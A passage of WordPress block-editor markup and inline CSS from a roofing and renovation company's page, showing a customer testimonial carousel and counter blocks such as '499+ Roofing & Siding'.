you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"be53c5bc\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-be53c5bc .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-be53c5bc\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-be53c5bc\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"4c086610-bd57-4da0-863d-9e60a966c85a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-4c086610-bd57-4da0-863d-9e60a966c85a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-4c086610-bd57-4da0-863d-9e60a966c85a.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-4c086610-bd57-4da0-863d-9e60a966c85a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-4c086610-bd57-4da0-863d-9e60a966c85a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"6b0e2ffd-e3fd-4707-bd8d-df424a1d4029\"} -->\n<style type=\"text/css\"> .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px 